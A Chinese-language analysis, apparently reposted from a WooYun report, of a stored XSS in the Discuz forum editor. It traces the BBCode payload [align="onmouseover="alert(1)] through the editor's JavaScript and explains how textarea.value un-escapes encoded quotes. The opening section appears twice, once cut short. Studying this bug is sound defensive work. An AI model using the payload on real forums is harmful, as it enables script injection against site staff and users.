产生原因: JS原生取ELEMENT中HTML内容的方法,会将服务端转义过的单双引号实体编码进行反转。 代码分析: 这里有payload: [align="onmouseover="alert(1)], 那么就从payload开始往回看漏洞是怎么产生的 ``` <textarea name='message' id='e_textarea' class='pt' rows='15' tabindex='2'>[align="onmouseover="alert(1)]</textarea> ``` 回帖之后payload显示如上述所示, 跟进 管理员/版主 编辑帖子时的操作 ``` var editorid = 'e'; var textobj = $(editorid + '_textarea'); ``` 这里得到textobj = 'e_textarea' /static/js/common.js Line8: ``` function $(id){ return !id? null : document.getElementById(id); } ``` 跟进textobj可以发现 $(textobj) 提出的payload ``` [align="onmouseover="alert(1)] ``` 进入bbcode2html() /static/js/bbcode.js Line 95: ``` str = str.replace(/\[align=([^\[\<]+?)\]/ig, '<div align="$1">'); ``` 这里将payload ``` [align="onmouseover="alert(1)] ``` 转换成 ``` <div align=""onmouseover="alert(1)"></div> ``` /static/js/editor.js Line 39: ``` writeEditorContents(isUndefined(initialtext) ? textobj.value : initiatext ); ``` 跟进writeEditorContents参数看下 /static/js/editor.js Line 558: ``` function...
产生原因: JS原生取ELEMENT中HTML内容的方法,会将服务端转义过的单双引号实体编码进行反转。 代码分析: 这里有payload: [align="onmouseover="alert(1)], 那么就从payload开始往回看漏洞是怎么产生的 ``` <textarea name='message' id='e_textarea' class='pt' rows='15' tabindex='2'>[align="onmouseover="alert(1)]</textarea> ``` 回帖之后payload显示如上述所示, 跟进 管理员/版主 编辑帖子时的操作 ``` var editorid = 'e'; var textobj = $(editorid + '_textarea'); ``` 这里得到textobj = 'e_textarea' /static/js/common.js Line8: ``` function $(id){ return !id? null : document.getElementById(id); } ``` 跟进textobj可以发现 $(textobj) 提出的payload ``` [align="onmouseover="alert(1)] ``` 进入bbcode2html() /static/js/bbcode.js Line 95: ``` str = str.replace(/\[align=([^\[\<]+?)\]/ig, '<div align="$1">'); ``` 这里将payload ``` [align="onmouseover="alert(1)] ``` 转换成 ``` <div align=""onmouseover="alert(1)"></div> ``` /static/js/editor.js Line 39: ``` writeEditorContents(isUndefined(initialtext) ? textobj.value : initiatext ); ``` 跟进writeEditorContents参数看下 /static/js/editor.js Line 558: ``` function writeEditorContents(text){ ... # 写操作函数, text被直接写入html文件中 ... } ``` 到此为止外部代码已经被成功插入并保存到新生成的html中 以上就是整个xss形成的原因, 最重要的原因是将textobj.value直接提出来当做插入的内容了 这里就有一个问题 比方说有如下代码 ``` <textarea id=test><img src=x></textarea> <script> str = document.getElementById('test').value; document.write(str); </script> ``` 这里可以发现写入了一个img标签 尖括号&lt; 和 &gt; 被反转义回<和>了 dz的这个xss就是没有处理反转义回来的尖括号造成了这个位置的xss 乌云案例: [参考链接](http://www.wooyun.org/bugs/wooyun-2010-099979)
